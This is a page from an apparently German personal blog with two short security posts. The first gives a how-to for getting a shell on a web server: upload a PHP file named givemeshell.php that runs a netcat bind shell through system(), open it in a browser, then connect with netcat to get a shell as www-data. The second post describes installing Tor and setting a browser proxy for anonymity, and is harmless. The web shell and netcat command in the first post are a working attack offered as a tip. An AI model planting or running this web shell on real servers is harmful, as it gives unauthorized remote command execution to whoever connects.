security – exdc

how to get shell access in no mans land

Februar 3, 2010Juni 10, 2013 kero Ein Kommentar

Eine Datei namens givemeshell.php erstellen und auf den Webserver laden, die sollte so was wie

<?php system("nc -lp 3222 -e /bin/sh"); ?>

enthalten. Danach die Datei per Webbrowser aufrufen und dann lokal

netcat webserver 3222

aufrufen. Und schon hat man unter Debian (Ubuntu sicherlich auch) eine shell als www-data.
Ich hab den Artikel erst nur überflogen, wohl weil ich damals schon einen LB eingesetzt habe und die Apache Server alle gut abgeschirmt sind. Es ist immer wieder interessant wie schnell man einfache Barrieren umgehen kann.

via nion’s blog

Anonymitaet gefaellig?

Juli 15, 2007Juli 15, 2007 kero Schreib einen Kommentar

Kurze Pause gemacht, kurz Artikel gelesen, kurz ausprobiert.

aptitude install tor

fertig. Nun noch fix im browser

einstellen und schon hat man eine neue IP und ist anonym im Netz. (kleines update: eigentlich sollte man dort lieber SOCKS v4 waehlen)

host 85.214.71.55
55.71.214.85.in-addr.arpa domain name pointer anonymisierungsdienst2.foebud.org.

Gefaellt mir gut. Auf der Homepage von tor gibt es eine gute Uebersicht wie das System funktioniert.